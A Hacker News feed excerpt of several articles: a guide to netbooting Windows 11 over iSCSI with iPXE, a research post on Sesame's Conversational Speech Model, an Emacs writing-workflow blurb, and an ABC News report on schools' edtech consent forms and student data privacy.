    February 28, 2025 | https://terinstock.com/post/2025/02/Netboot-Windows-11-with-iSCSI-and-iPXE/ | archive.org

A fictitious screenshot of a permanent ban from a game, in the Windows 95 installer style, with a 90s-era PC and a joystick in the left banner. The text is titled "Permanent Suspension" and reads "Your account has been permanently suspended due to the use of unauthorized Operating Systems or unauthorized virtual machines. This type of behavior causes damage to our community and the game's competitive integrity. This action will not be reversed."

Purposefully ambiguous and fictitious permanent ban.

    (created with @foone’s The Death Generator)

    My primary operating system is Linux: I have it installed on my laptop and desktop. Thanks to the amazing work of the WINE, CodeWeavers, and Valve developers, it’s also where I do PC gaming. I can spin up Windows in a virtual machine for the rare times I need to use it, and even pass through a GPU if I want to do gaming.

    There is one pretty big exception: playing the AAA game ████████████████ with friends. Unfortunately, the developer only allows Windows. If you attempt to run the game on Linux or they detect you’re running in a virtual machine, your device and account are permanently banned. I would prefer not to be permanently banned.

For the past several years my desktop has also had a disk dedicated to maintaining a Windows install. I’d prefer to use the space in my PC case1 for disks for Linux. Since I already run a home NAS, and my Windows usage is infrequent, I wondered if I could offload the Windows install to my NAS instead. This led me down the path of netbooting Windows 11 and writing up these notes on how to do a simplified “modern” version.

    My first task was determining how to get a computer to boot from a NAS. My experience with network block devices is with Ceph RBD, where a device is mounted into an already running operating system. For booting over an Ethernet IP network the standard is iSCSI. A great way to boot from an iSCSI disk is with iPXE. To avoid any mistakes during this process, I removed all local drives from the system.2

I didn’t want to run a TFTP server on my home network, or reconfigure DHCP to provide TFTP configuration. Even if I did, the firmware for my motherboard is designed for “gamers”: there’s no PXE ROM. I can enable UEFI networking and a network boot option appears in the boot menu, but no DHCP requests are made3. Fortunately, iPXE is available as a bootable USB image, which loaded and started trying to fetch configuration from the network.

    Hitting ctrl-b as directed on screen to drop to the iPXE shell, I could verify basic functionality was working.

    iPXE 1.21.1+ (e7585fe) -- Open Source Network Boot Firmware -- https://ipxe.org
    Features: DNS FTP HTTP HTTPS iSCSI NFS TFTP VLAN SRP AoE EFI Menu
    iPXE> dhcp
    Configuring (net0 04:20:69:91:C8:DD)...... ok
    iPXE> show ${net0/ip}
    192.0.2.3
    

    I decided to use tgt as the iSCSI target daemon on my NAS4 as the configuration seemed the least complicated. In /etc/tgt/targets.conf I configured it with two targets: one as the block device I wanted to install Windows onto and the other being the installation ISO.

    <target iqn.2025-02.com.example:win-gaming>
        backing-store /dev/zvol/zroot/sans/win-gaming
        params thin-provisioning=1
    </target>
    
    <target iqn.2025-02.com.example:win11.iso>
        backing-store /opt/isos/Win11_24H2_English_x64.iso
        device-type cd
        readonly 1
    </target>
    

    Back on the PC, I could tell iPXE to use these iSCSI disks, then boot onto the DVD. As multiple network drives are being added, each must be given a different drive ID starting from 0x80.

    iPXE> sanhook --drive 0x80 iscsi:nas.example.com:::1:iqn.2025-02.com.example:win-gaming
    Registered SAN device 0x80
    iPXE> sanhook --drive 0x81 iscsi:nas.example.com:::1:iqn.2025-02.com.example:win11.iso
    Registered SAN device 0x81
    iPXE> sanboot --drive 0x81
    Booting from SAN device 0x81
    

    After a minute of the Windows 11 logo and a spinner, the Windows 11 setup appears. In an ideal situation, I could immediately start installing. Unfortunately, the Windows 11 DVD does not ship drivers for my network card, and the iSCSI connection information passed to the booted system from iPXE couldn’t be used. I’m a bit impressed the GUI loaded at all, instead of just crashing.

    To rectify this, I would need to build a Windows PE image that included my networking drivers. WinPE is the minimal environment used when installing Windows. Fortunately, Microsoft has made this pretty easy nowadays. I downloaded and installed the Windows Assessment and Deployment Kit and the Windows PE add-on. After running “Deployment and Imaging Tools Environment” as an administrator, I could make a folder containing a base WinPE image.

    > mkdir C:\winpe
    > copype amd64 C:\winpe\amd64
    

    After mounting the image, I was able to slipstream the Intel drivers. I searched through the inf files to find the folder that supported my network card.

    > imagex /mountrw C:\winpe\amd64\media\sources\boot.wim C:\winpe\amd64\mount
    > dism /image:C:\winpe\amd64\mount /add-driver /driver:C:\temp\intel\PRO1000\Winx64\W11\
    > imagex /unmount /commit C:\winpe\amd64\mount
    

    This new image is what we need to boot into to install Windows. As my NAS is also running an HTTP server, I copied over the files relevant to netbooting: from “C:‍\winpe\amd64\media” I copied “boot/BCD”, “boot/boot.sdi”, and “sources/boot.wim”, preserving the folders. I also downloaded wimboot to the same directory.

    You can use iPXE to execute a script fetched with HTTP, which I took advantage of to reduce the amount of typing I’ll need to do at the shell. I saved the following script as “install.ipxe” in the same HTTP directory.

    #!ipxe
    
    sanhook --drive 0x80 iscsi:nas.example.com:::1:iqn.2025-02.com.example:win-gaming
    sanhook --drive 0x81 iscsi:nas.example.com:::1:iqn.2025-02.com.example:win11.iso
    kernel wimboot
    initrd boot/BCD BCD
    initrd boot/boot.sdi boot.sdi
    initrd sources/boot.wim boot.wim
    boot
    

    Rebooting back to the iPXE prompt I could then boot using this script.

    iPXE> dhcp
    iPXE> chain http://nas.example.com/ipxe/install.ipxe
    

    After a few seconds I was booted into WinPE with a Command Prompt. The command “wpeinit” ran automatically, configuring the network card and mounting the iSCSI disks. I found the DVD had been mounted as drive “D”, and could start the Windows Setup with “D:‍\setup.exe”.

    However, after reaching the “Searching for Disks” screen the installer closed itself without any error. This seems to be a bug with the new version of setup, as restarting it and selecting the “Previous Version of Setup” on an earlier page used a version of the installer that worked.

    The installation was spread across several restarts. Fortunately, once the installation files are copied over, nothing but the main disk image is required, reducing what I needed to type in the iPXE shell. The HTTP server could also be cleaned up at this point.

    iPXE> dhcp
    iPXE> sanboot iscsi:nas.example.com:::1:iqn.2025-02.com.example:win-gaming
    

After several more minutes, and a forced installation of a Windows zero-day patch, I was greeted by a Windows 11 desktop, booted over iSCSI. Task Manager even reports the C drive as being “SSD (iSCSI)”.

    Booting from a USB stick and typing into an iPXE prompt every time I want to boot into Windows isn’t a great user experience. Fortunately, iPXE is also available as an EFI application which can be installed to the local EFI System Partition. I also discovered that iPXE will execute commands provided on the command line.

    I reinstalled the disks used for Linux, copied over ipxe.efi to the EFI System Partition, and added a new entry to systemd-boot by creating “$ESP/loader/entries/win11.conf”

    title Windows 11 (iPXE)
    efi /ipxe/ipxe.efi
    options prompt && dhcp && sanboot iscsi:nas.example.com:::1:iqn.2025-02.com.example:win-gaming
    

There seems to be a bug where the first word in the options field is ignored.5 I used a valid iPXE command, prompt, as the first word, which also provides a clear signal should it ever start being interpreted in a future version.

After a little bit of extra setup (installing Firefox and switching to dark mode), I was able to install Steam and the game. The game took a little bit longer to install due to the slower disk speed over my network (time to upgrade to 10GbE?), but there was no noticeable delay during normal gameplay. I didn’t see any network saturation or high disk latencies in Task Manager during loading.

    ]]>
    https://terinstock.com/post/2025/02/Netboot-Windows-11-with-iSCSI-and-iPXE/ hacker-news-small-sites-43204604 Fri, 28 Feb 2025 11:47:52 GMT
    <![CDATA[Crossing the uncanny valley of AI conversational voice]]> thread link) | @nreece
    February 28, 2025 | https://www.sesame.com/research/crossing_the_uncanny_valley_of_voice | archive.org

    February 27, 2025

    Brendan Iribe, Ankit Kumar, and the Sesame team

    How do we know when someone truly understands us? It is rarely just our words—it is in the subtleties of voice: the rising excitement, the thoughtful pause, the warm reassurance.

    Voice is our most intimate medium as humans, carrying layers of meaning through countless variations in tone, pitch, rhythm, and emotion.

    Today’s digital voice assistants lack essential qualities to make them truly useful. Without unlocking the full power of voice, they cannot hope to effectively collaborate with us. A personal assistant who speaks only in a neutral tone has difficulty finding a permanent place in our daily lives after the initial novelty wears off.

    Over time this emotional flatness becomes more than just disappointing—it becomes exhausting.

    Achieving voice presence

    At Sesame, our goal is to achieve “voice presence”—the magical quality that makes spoken interactions feel real, understood, and valued. We are creating conversational partners that do not just process requests; they engage in genuine dialogue that builds confidence and trust over time. In doing so, we hope to realize the untapped potential of voice as the ultimate interface for instruction and understanding.

    Key components

    • Emotional intelligence: reading and responding to emotional contexts.
    • Conversational dynamics: natural timing, pauses, interruptions and emphasis.
    • Contextual awareness: adjusting tone and style to match the situation.
    • Consistent personality: maintaining a coherent, reliable and appropriate presence.

    We’re not there yet

    Building a digital companion with voice presence is not easy, but we are making steady progress on multiple fronts, including personality, memory, expressivity and appropriateness. This demo is a showcase of some of our work in conversational speech generation. The companions shown here have been optimized for friendliness and expressivity to illustrate the potential of our approach.

    Conversational voice demo

    1. Microphone permission is required. 2. Calls are recorded for quality review but not used for ML training and are deleted within 30 days. 3. By using this demo, you are agreeing to our Terms of Use and Privacy Policy. 4. We recommend using Chrome (Audio quality may be degraded in iOS/Safari 17.5).

    Technical post

    Authors

    Johan Schalkwyk, Ankit Kumar, Dan Lyth, Sefik Emre Eskimez, Zack Hodari, Cinjon Resnick, Ramon Sanabria, Raven Jiang

    To create AI companions that feel genuinely interactive, speech generation must go beyond producing high-quality audio—it must understand and adapt to context in real time. Traditional text-to-speech (TTS) models generate spoken output directly from text but lack the contextual awareness needed for natural conversations. Even though recent models produce highly human-like speech, they struggle with the one-to-many problem: there are countless valid ways to speak a sentence, but only some fit a given setting. Without additional context—including tone, rhythm, and history of the conversation—models lack the information to choose the best option. Capturing these nuances requires reasoning across multiple aspects of language and prosody.

To address this, we introduce the Conversational Speech Model (CSM), which frames the problem as an end-to-end multimodal learning task using transformers. It leverages the history of the conversation to produce more natural and coherent speech. There are two key takeaways from our work. The first is that CSM operates as a single-stage model, thereby improving efficiency and expressivity. The second is our evaluation suite, which is necessary for evaluating progress on contextual capabilities and addresses the fact that common public evaluations are saturated.

    Background

    One approach to modeling audio with transformers is to convert continuous waveforms into discrete audio token sequences using tokenizers. Most contemporary approaches ([1], [2]) rely on two types of audio tokens:

    1. Semantic tokens: Compact speaker-invariant representations of semantic and phonetic features. Their compressed nature enables them to capture key speech characteristics at the cost of high-fidelity representation.
    2. Acoustic tokens: Encodings of fine-grained acoustic details that enable high-fidelity audio reconstruction. These tokens are often generated using Residual Vector Quantization (RVQ) [2]. In contrast to semantic tokens, acoustic tokens retain natural speech characteristics like speaker-specific identity and timbre.

A common strategy first models semantic tokens and then generates audio using RVQ or diffusion-based methods. Decoupling these steps allows for a more structured approach to speech synthesis—the semantic tokens provide a compact, speaker-invariant representation that captures high-level linguistic and prosodic information, while the second stage reconstructs the fine-grained acoustic details needed for high-fidelity speech. However, this approach has a critical limitation: semantic tokens are a bottleneck that must fully capture prosody, but ensuring this during training is challenging.

    RVQ-based methods introduce their own set of challenges. Models must account for the sequential dependency between codebooks in a frame. One method, the delay pattern (figure below) [3], shifts higher codebooks progressively to condition predictions on lower codebooks within the same frame. A key limitation of this approach is that the time-to-first-audio scales poorly because an RVQ tokenizer with N codebooks requires N backbone steps before decoding the first audio chunk. While suitable for offline applications like audiobooks, this delay is problematic in a real-time scenario.

    Example of delayed pattern generation in an RVQ tokenizer with 4 codebooks
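As a concrete illustration, here is a minimal Python sketch of the delay pattern (my own layout assumptions, not reference code from the cited papers): codebook k is shifted right by k steps, so each higher codebook is predicted conditioned on the lower codebooks of the same original frame, and all N levels of the first frame only become available after N steps.

import numpy as np

def apply_delay_pattern(codes, pad_id=-1):
    """codes: (num_codebooks, num_frames) grid of RVQ token ids.
    Returns a (num_codebooks, num_frames + num_codebooks - 1) grid in
    which codebook k is delayed by k steps; gaps hold pad_id."""
    n_q, t = codes.shape
    out = np.full((n_q, t + n_q - 1), pad_id, dtype=codes.dtype)
    for k in range(n_q):
        out[k, k:k + t] = codes[k]  # shift row k right by k positions
    return out

# 4 codebooks, 6 frames, matching the figure: the tokens of frame 0 sit
# on a diagonal, so decoding the first frame requires 4 backbone steps.
print(apply_delay_pattern(np.arange(24).reshape(4, 6)))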

    Conversational Speech Model

    CSM is a multimodal, text and speech model that operates directly on RVQ tokens. Inspired by the RQ-Transformer [4], we use two autoregressive transformers. Different from the approach in [5], we split the transformers at the zeroth codebook. The first multimodal backbone processes interleaved text and audio to model the zeroth codebook. The second audio decoder uses a distinct linear head for each codebook and models the remaining N – 1 codebooks to reconstruct speech from the backbone’s representations. The decoder is significantly smaller than the backbone, enabling low-latency generation while keeping the model end-to-end.

    CSM model inference process. Text (T) and audio (A) tokens are interleaved and fed sequentially into the Backbone, which predicts the zeroth level of the codebook. The Decoder then samples levels 1 through N – 1 conditioned on the predicted zeroth level. The reconstructed audio token (A) is then autoregressively fed back into the Backbone for the next step, continuing until the audio EOT symbol is emitted. This process begins again on the next inference request, with the interim audio (such as a user utterance) being represented by interleaved audio and text transcription tokens.
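The loop in the figure can be summarized in a few lines. This is a schematic of the two-stage generation step as described above, with toy stand-ins for the two transformers; the function names and internals are illustrative assumptions, not Sesame's implementation.

import random

def backbone(history):
    # Toy stand-in for the large multimodal transformer: consumes the
    # interleaved text/audio history and returns a hidden state plus a
    # sampled zeroth-codebook token (1024 is an arbitrary toy vocabulary).
    hidden = hash(tuple(history)) % 10_000
    return hidden, random.randrange(1024)

def decoder(hidden, frame_so_far, level):
    # Toy stand-in for the small decoder with a distinct head per level.
    return (hidden + sum(frame_so_far) + level) % 1024

def generate_frame(history, num_codebooks):
    """One inference step: the backbone predicts level 0, then the
    decoder fills levels 1..N-1 conditioned on the levels sampled so far."""
    hidden, c0 = backbone(history)
    frame = [c0]
    for level in range(1, num_codebooks):
        frame.append(decoder(hidden, frame, level))
    return frame

history = [1, 2, 3]    # interleaved text/audio token ids
frame = generate_frame(history, num_codebooks=8)
history.extend(frame)  # the audio frame is fed back autoregressively
print(frame)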

    Both transformers are variants of the Llama architecture. Text tokens are generated via a Llama tokenizer [6], while audio is processed using Mimi, a split-RVQ tokenizer, producing one semantic codebook and N – 1 acoustic codebooks per frame at 12.5 Hz. [5] Training samples are structured as alternating interleaved patterns of text and audio, with speaker identity encoded directly in the text representation.
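Based only on that description, a training sample might be assembled along these lines; the exact interleaving format and speaker encoding are unpublished, so this sketch is an assumption.

def interleave_turns(turns):
    """turns: list of (speaker_id, text_tokens, audio_frames).
    Speaker identity is encoded directly in the text stream."""
    sequence = []
    for speaker_id, text_tokens, audio_frames in turns:
        sequence.append(f"[speaker:{speaker_id}]")  # hypothetical marker
        sequence.extend(text_tokens)                # text segment
        sequence.extend(audio_frames)               # audio frames at 12.5 Hz
    return sequence

sample = interleave_turns([
    ("A", ["hel", "lo"], [101, 102, 103]),
    ("B", ["hi"], [104, 105]),
])
print(sample)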

    Compute amortization

This design introduces significant infrastructure challenges during training. The audio decoder autoregressively processes an effective batch size of B × S with N codebooks, where B is the original batch size, S is the sequence length, and N is the number of RVQ codebook levels. This high memory burden, even with a small model, slows down training, limits model scaling, and hinders rapid experimentation, all of which are crucial for performance.

    To address these challenges, we use a compute amortization scheme that alleviates the memory bottleneck while preserving the fidelity of the full RVQ codebooks. The audio decoder is trained on only a random 1/16 subset of the audio frames, while the zeroth codebook is trained on every frame. We observe no perceivable difference in audio decoder losses during training when using this approach.

Amortized training process. The backbone transformer models the zeroth level across all frames (highlighted in blue), while the decoder predicts the remaining N – 1 levels, but only for a random 1/16th of the frames (highlighted in green). The top section highlights the specific frames modeled by the decoder for which it receives loss.
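A minimal sketch of the frame subsampling behind this scheme, with shapes assumed for illustration: the zeroth-codebook loss covers every frame, while the decoder loss for levels 1 through N – 1 is computed only on the masked subset, cutting the decoder's effective batch from B × S frames to roughly B × S / 16.

import numpy as np

rng = np.random.default_rng(0)

def decoder_frame_mask(batch_size, seq_len, frac=1 / 16):
    """Boolean mask of the frames on which the audio decoder receives
    loss. The backbone's zeroth-codebook loss still covers all frames."""
    num_kept = max(1, int(seq_len * frac))
    mask = np.zeros((batch_size, seq_len), dtype=bool)
    for b in range(batch_size):
        kept = rng.choice(seq_len, size=num_kept, replace=False)
        mask[b, kept] = True
    return mask

# With the 2048-token sequences used in training, ~128 frames per
# sequence are decoder-supervised.
mask = decoder_frame_mask(batch_size=4, seq_len=2048)
print(mask.sum(axis=1))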

    Experiments

    Dataset: We use a large dataset of publicly available audio, which we transcribe, diarize, and segment. After filtering, the dataset consists of approximately one million hours of predominantly English audio.

    Model Sizes: We trained three model sizes, delineated by the backbone and decoder sizes:

    • Tiny: 1B backbone, 100M decoder
    • Small: 3B backbone, 250M decoder
    • Medium: 8B backbone, 300M decoder

    Each model was trained with a 2048 sequence length (~2 minutes of audio) over five epochs.

    Samples

    Paralinguistics

    Sentences from Base TTS

    Foreign words

    Sentences from Base TTS

    Contextual expressivity

    Samples from Expresso, continuation after chime

    Pronunciation correction

The pronunciation correction sentence is a recording; all other audio is generated.

    Conversations with multiple speakers

    Single generation using audio prompts from two speakers

    Evaluation

    Our evaluation suite measures model performance across four key aspects: faithfulness to text, context utilization, prosody, and latency. We report both objective and subjective metrics—objective benchmarks include word error rate and novel tests like homograph disambiguation, while subjective evaluation relies on a Comparative Mean Opinion Score (CMOS) human study using the Expresso dataset.

    Objective metrics

    Traditional benchmarks, such as word error rate (WER) and speaker similarity (SIM), have become saturated—modern models, including CSM, now achieve near-human performance on these metrics.

    Objective metric results for Word Error Rate (top) and Speaker Similarity (bottom) tests, showing the metrics are saturated (matching human performance).

    To better assess pronunciation and contextual understanding, we introduce a new set of phonetic transcription-based benchmarks.

    • Text understanding through Homograph Disambiguation: Evaluates whether the model correctly pronounced different words with the same orthography (e.g., “lead” /lɛd/ as in “metal” vs. “lead” /liːd/ as in “to guide”).
    • Audio understanding through Pronunciation Continuation Consistency: Evaluates whether the model maintains pronunciation consistency of a specific word with multiple pronunciation variants in multi-turn speech. One example is “route” (/raʊt/ or /ruːt/), which can vary based on region of the speaker and context.

    Objective metric results for Homograph Disambiguation (left) and Pronunciation Consistency (right) tests, showing the accuracy percentage for each model’s correct pronunciation. Play.ht, Elevenlabs, and OpenAI generations were made with default settings and voices from their respective API documentation.

    The graph above compares objective metric results across three model sizes. For Homograph accuracy we generated 200 speech samples covering 5 distinct homographs—lead, bass, tear, wound, row—with 2 variants for each and evaluated pronunciation consistency using wav2vec2-lv-60-espeak-cv-ft. For Pronunciation Consistency we generated 200 speech samples covering 10 distinct words that have common pronunciation variants—aunt, data, envelope, mobile, route, vase, either, adult, often, caramel.
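For a rough idea of how such a phonetic check could be scripted: the checkpoint name comes from the paragraph above, but the decoding calls, matching rule, and target phoneme strings are my assumptions, not the paper's exact protocol.

import torch
from transformers import AutoProcessor, Wav2Vec2ForCTC

model_id = "facebook/wav2vec2-lv-60-espeak-cv-ft"
processor = AutoProcessor.from_pretrained(model_id)
model = Wav2Vec2ForCTC.from_pretrained(model_id)

def transcribe_phonemes(waveform_16khz):
    """CTC-decode a 16 kHz waveform into an espeak-style phoneme string."""
    inputs = processor(waveform_16khz, sampling_rate=16_000, return_tensors="pt")
    with torch.no_grad():
        logits = model(**inputs).logits
    return processor.batch_decode(torch.argmax(logits, dim=-1))[0]

def homograph_correct(waveform, expected, wrong):
    # e.g. expected "l ɛ d" vs. wrong "l iː d" for "lead", the metal
    # (hypothetical target strings for illustration).
    phones = transcribe_phonemes(waveform)
    return expected in phones and wrong not in phones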

    In general, we observe that performance improves with larger models, supporting our hypothesis that scaling enhances the synthesis of more realistic speech.

    Subjective metrics

    We conducted two Comparative Mean Opinion Score (CMOS) studies using the Expresso dataset to assess the naturalness and prosodic appropriateness of generated speech for CSM-Medium. Human evaluators were presented with pairs of audio samples—one generated by the model and the other a ground-truth human recording. Listeners rated the generated sample on a 7-point preference scale relative to the reference. Expresso’s diverse expressive TTS samples, including emotional and prosodic variations, make it a strong benchmark for evaluating appropriateness to context.

    In the first CMOS study we presented the generated and human audio samples with no context and asked listeners to “choose which rendition feels more like human speech.” In the second CMOS study we also provide the previous 90 seconds of audio and text context, and ask the listeners to “choose which rendition feels like a more appropriate continuation of the conversation.” Eighty people were paid to participate in the evaluation and rated on average 15 examples each.

    Subjective evaluation results on the Expresso dataset. No context: listeners chose “which rendition feels more like human speech” without knowledge of the context. Context: listeners chose “which rendition feels like a more appropriate continuation of the conversation” with audio and text context. 50:50 win–loss ratio suggests that listeners have no clear preference.

    The graph above shows the win-rate of ground-truth human recordings vs CSM-generated speech samples for both studies. Without conversational context (top), human evaluators show no clear preference between generated and real speech, suggesting that naturalness is saturated. However, when context is included (bottom), evaluators consistently favor the original recordings. These findings suggest a noticeable gap remains between generated and human prosody in conversational speech generation.

    Open-sourcing our work

    We believe that advancing conversational AI should be a collaborative effort. To that end, we’re committed to open-sourcing key components of our research, enabling the community to experiment, build upon, and improve our approach. Our models will be available under an Apache 2.0 license.

    Limitations and future work

    CSM is currently trained on primarily English data; some multilingual ability emerges due to dataset contamination, but it does not perform well yet. It also does not take advantage of the information present in the weights of pre-trained language models.

    In the coming months, we intend to scale up model size, increase dataset volume, and expand language support to over 20 languages. We also plan to explore ways to utilize pre-trained language models, working towards large multimodal models that have deep knowledge of both speech and text.

    Ultimately, while CSM generates high quality conversational prosody, it can only model the text and speech content in a conversation—not the structure of the conversation itself. Human conversations are a complex process involving turn taking, pauses, pacing, and more. We believe the future of AI conversations lies in fully duplex models that can implicitly learn these dynamics from data. These models will require fundamental changes across the stack, from data curation to post-training methodologies, and we’re excited to push in these directions.

    Join us

    If you’re excited about building the most natural, delightful, and inspirational voice interfaces out there, reach out—we’re hiring. Check our open roles.

    ]]>
    https://www.sesame.com/research/crossing_the_uncanny_valley_of_voice hacker-news-small-sites-43204493 Fri, 28 Feb 2025 11:34:11 GMT
    <![CDATA[Emacs Writing Studio]]> thread link) | @adityaathalye
    February 28, 2025 | https://lucidmanager.org/tags/emacs/ | archive.org

    The EWS configuration follows a five-step workflow for producing written creative works:

    1. Ingestion: Reading, listening and watching to develop new ideas.
    2. Ideation: Cultivating your ideas by taking and managing notes.
    3. Production: Writing and editing.
    4. Publication: Export Org mode to PDF, ePub, word processor or a website.
    5. Communication: Tell others about your work and exchange ideas.

    The articles linked below introduce using Emacs and show how to implement the EWS workflow.

    Emacs Writing Studio is available as an e-book from your favourite retailer.

    The source files of the book and EWS configuration are also freely available on GitHub.

    ]]>
    https://lucidmanager.org/tags/emacs/ hacker-news-small-sites-43204240 Fri, 28 Feb 2025 10:56:36 GMT
    <![CDATA[You read the terms and conditions, right? For your children's classes, right?]]> thread link) | @ColinWright
    February 28, 2025 | https://www.abc.net.au/news/2025-02-27/classroom-apps-technology-kids-data-terms-conditions/104966952 | archive.org

    As schools ask parents to read hundreds of thousands of words to consent to technology usage in classrooms, who's protecting their children's data?

    When Kim Nguyen's daughter started a new year at primary school, there was one permission form that really took her aback.

    "The first impression is: 'Oh my God, there's so many things'."

    It was asking her to consent to her daughter's personal details being used on more than 20 "third party online service providers [that] are external to the school".

    A mother and daughter sit together on a bed using a tablet.

Kim Nguyen has found it frustrating to assess the multitude of digital platforms used by students in her daughter's classroom. (ABC News: Esther Linder)

    The school was asking for permission to disclose details including her daughter's full name, date of birth, school, classroom and other identifying and personal details to all of these third parties.

    But there was little guidance about the risks or benefits of using each of these services and only generic descriptions of what they were or how they would be used ...

    ... along with a directive that parents should read the terms of service and privacy policies for all 20 platforms.

Keep that in mind: as this story goes on, we'll compare your reading progress to the scale of the 'homework' Kim was tasked with by her daughter's school.

    A close view of pages filled with legal text. The paper is bright orange.

    The consent form Kim received said "we encourage you to read the information provided about each online service, including the terms of use and privacy policy", which amounted to hundreds of pages of dense legalese.

    Seven long strips of paper filled with legal text and pinned to a wall. The central column is bright orange paper.

    All up, it was more than 200,000 words — about the same length as Moby Dick.

    A person looking at long strips of paper pinned to a wall and flowing out across the floor. The central column is bright orange.

    To get a better feel for how much text this really is we printed it all out and stuck it to a wall.

    The longest of them — for a tool called ClassDojo — not only didn't fit on the wall, but was longer than the entire length of the large hall we were working in.

    A mess of orange paper on the floor.

    It's fair to say that Kim was drowning in information.

    It's hard to believe any parent would read it all.

    While Kim had a lot of legal detail about these services, it was all but impossible to sift through it for the clues that would let her make the decisions she was being asked to make.

    And she's not alone. As time goes on, parents are feeling less in control of their kids' online safety.

    The vast majority of parents surveyed told the Office of the Australian Information Commissioner (OAIC) that protecting their child's personal information was a major concern. But since 2020, the proportion of parents who feel in control of that privacy has dropped by 12 points, to 50 per cent. 

    Of course, not reading the terms of service is such a universal experience that there are hundreds of memes about it. It's safe to say many parents extend that practice to signing up for things on behalf of their children, and for good reason: if you attempt to read the terms it very quickly starts to feel like a pointless and endless exercise.

    But these agreements can have serious, unexpected consequences.

    ClassDojo  — a classroom management and communication platform that tries to encourage good behaviour through gamification — is one of the most popular apps for primary schools and is one that's listed in the consent form used by Kim's daughter's Brisbane public primary school.

    Taken together, ClassDojo's terms of service and privacy policy (in orange above) clock in at just over 40,000 words. Let's use that as a benchmark to get a feel for how long this school is asking parents to spend on the task of assessing the risks and benefits of allowing their child to use it.

Thanks for sticking with it! In the time it took to read this far, you would have covered just 1 per cent of the ClassDojo documents.

    The sheer scale isn't the only problem. Even if parents take the time to read these documents, it's really hard to properly understand what they're saying. And some of that is possibly deliberate given findings by experts on how companies exploit and share students' data in ways parents and students alike find objectionable.

    While Kim took the task of giving (or withholding) consent on behalf of her daughter seriously, she found little point in reading the policies.

    "It's too much information … and some of the information, I can't really tell what's the difference," she said.

    Why are these documents so long and difficult to understand?

    Tegan Cohen researches digital platforms and privacy law at Queensland University of Technology, and she says it all starts with legislation.

    "Often what companies are trying to do when they draft these privacy policies is future proof," she says.

    A portrait of Tegan Cohen. She is smiling at the camera, has long dark hair and is wearing hoop earings.

    "You'll see purposes like — we'll collect data about your use of this service for analytics purposes to improve our service — and that could mean really any number of things."(Supplied: Tegan Cohen)

    "Basically, once you collect personal information, you're only allowed to use it for the purpose that you originally collected it for." 

    That is, what they say they'll use it for in their privacy policy. So that means companies tend to describe the types of data collected and the ways they might use it as broadly as they can.

    So parents end up trying to decipher phrases like this:

    "In addition to the uses mentioned above, we use the information we collect from students and Outside School Child Users to provide and improve (as allowed by law) the Service to the child, for educational, security and safety purposes, as authorized by law, or to enforce our Terms."

    Just establishing what data is collected about children by each service can be a challenge, let alone understanding why they need it and how they use it.

    The consent form Kim was asked to sign requested permission to share each of the following data points with more than 20 services:

    • full name;
    • gender;
    • date of birth;
    • student school username;
    • student school email;
    • student ID number;
    • school name;
    • year level;
    • class;
    • teacher; and
    • country.

    Permission form showing types of personal information to be put in to third-party online services used in a Queensland classroom

    A small portion of the long consent form used by a Queensland public primary school.

    The school's form clears the release of all of that data even if the third parties themselves don't ask for it.

    But it doesn't make clear why, for example, any of that would be needed for students to use Quizlet, which according to the consent form is "an online learning tool that allows users to create quizzes, flash cards and games".

    Known data breaches are 'tip of the iceberg'

    The collection of data is not the only issue. What happens to that data once it's stored? Globally, the education sector is a big target for malicious actors. 

    The organisation K-12 Security Information eXchange (K12 SIX) has tracked thousands of cyber security incidents at schools in the US, and says third party 'edtech' vendors are responsible for the majority of breaches.

    Data breaches and leaks are also the most common type of incident, with most affecting student data. 

    K12 SIX founder Doug Levin says the publicly disclosed breaches are just the tip of the iceberg. 

    A portrait of Doug Levin. He is smiling at the camera and wearing a dark business suit, white shirt anda blue tie.

    "I'm reporting on what's above the water line, not below, and we have a sense that there's a lot more happening below the water line."(Supplied: Doug Levin)

    And we don't really know how long these companies can keep data for.

    "What's important to know is, at least in the US context, many of our data systems include information not just about current students and staff, but former students and staff. Sometimes five, 10, even 20 years since they attended the institution," Mr Levin said.

    Remember, ClassDojo is just one of more than 20 services Kim was asked to give consent for. If one of them suffered a data breach how would it affect your child? Would you even know if there was a breach?

    Do we know how big this problem is?

    Unfortunately, Australia has no similar tracking of data leaks or cyber security incidents affecting educational institutions like schools. The notifiable data breaches reporting scheme, administered by the OAIC, does track the sector for reported breaches, but there are important gaps.

    The OAIC provided us with what statistics it could about the education sector, but cautioned "the Australian Privacy Act and therefore the Notifiable Data Breaches scheme generally does not apply to public schools and universities (other than private universities and the Australian National University)".

    Even with those caveats, there have been hundreds of data breaches affecting the Australian education sector since the scheme began operating in 2018 — figures that would include third-party vendors.

    Almost 40 per cent of those breaches are classified as "malicious or criminal attacks".

    What we don't know is how many students were affected, what systems were breached — or exactly what happened to students' data.

    Is anyone in charge taking these risks seriously?

    Anna Bunn, an associate professor at Curtin Law School and researcher in the ARC Centre of Excellence for the Digital Child, has been investigating how education authorities assess the tech products used in schools, and found it difficult to get any clear information on the methodologies used by state education departments.

    "We argue that these obligations require schools to go beyond mere legal compliance," Dr Bunn said.

    [Photo: portrait of Anna Bunn. (Supplied: Anna Bunn)]

    "There are serious, acknowledged limitations to the current consent-based information privacy regime applicable in Australia."

    When the ABC asked the Queensland Department of Education about its assessment processes, a spokesperson told us: "Before being adopted by individual state schools, third-party online services are assessed against the nationally endorsed Safer Technologies for Schools (ST4S) framework to ensure they meet appropriate standards for information security and privacy."

    ST4S is an initiative, cited by multiple experts and administrators we spoke to, run by Education Services Australia (ESA), a not-for-profit company owned by Australia's state, territory and federal education ministers. It aims to create "a standardised approach to evaluating digital products and services used by schools across Australia and New Zealand against a nationally consistent security and privacy control framework."

    After ABC News sought clarification on its statement, the Queensland Education Department admitted that in fact not all services for which schools seek parental permission have been through the ST4S assessment.

    When a product or service hasn't been through that process, it's "the responsibility of principals to assess its suitability", the department said.

    The principal's assessment "may involve reviewing the service’s privacy policies, security measures, and educational value to ensure alignment with relevant guidelines and best practices." When we asked for further details about those guidelines and best practices, we were sent links to two documents that cover obtaining and managing consent but not guidelines or best practices for assessing suitability or safety of the services.

    In effect, this appears to push responsibility for evaluating these services back onto parents via the consent process.

    Education Services Australia CEO Andrew Smith says that since 2019, when the ST4S initiative started, 340 tech products have been through the assessment.

    About 150 more have either been assessed as non-compliant or pulled out of the process partway through.

    Even so, many digital products used in classrooms have not been through the ST4S assessment and so would rely on departmental or school principal-led evaluations.

    How many products used in schools have not been assessed?

    That is "very hard to calculate because it changes almost daily", Smith said. But by his estimation "the majority of the most commonly used products" in Australian schools have been assessed through ST4S.

